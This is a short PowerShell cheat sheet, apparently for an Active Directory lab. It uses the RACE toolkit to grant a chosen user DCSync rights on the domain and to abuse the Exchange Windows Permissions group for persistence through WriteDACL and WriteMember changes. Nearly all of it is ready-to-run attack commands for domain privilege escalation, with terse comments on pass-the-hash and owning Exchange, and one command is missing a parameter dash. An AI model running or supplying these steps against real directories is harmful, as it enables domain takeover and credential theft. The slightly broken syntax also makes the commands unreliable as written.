# Own user in groups above or own exchange server
# PTH as user or exchange server
# Import ADModule and RACE
Import-Module .\ADModulemaster\Microsoft.ActiveDirectory.Management.dll
Import-Module .\ADModulemaster\ActiveDirectory\ActiveDirectory.psd1
Set-ADACL -SamAccountName DOMAIN\USER -DistinguishedName 'DC=techcorp,DC=local' -Server techcorp.local -Verbose
Set-ADACL -SamAccountName DOMAIN\USER DistinguishedName 'DC=techcorp,DC=local' -GUIDRight DCSync -Server techcorp.local -Verbose
# (As DA)Giving user WriteDACL over windows exhchange group for persistance
Set-DCPermissions -Method GroupDACL -DistinguishedName 'CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=techcorp,DC=local' -SAMAccountName DOMAIN\USER -Verbose
# (As user now added) Use that priv to modify acl of windows permissions and give write member
Set-ADACL -SamAccountName DOMAIN\USER -DistinguishedName 'CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=techcorp,DC=local' -GUIDRight WriteMember -Server techcorp.local -Verbose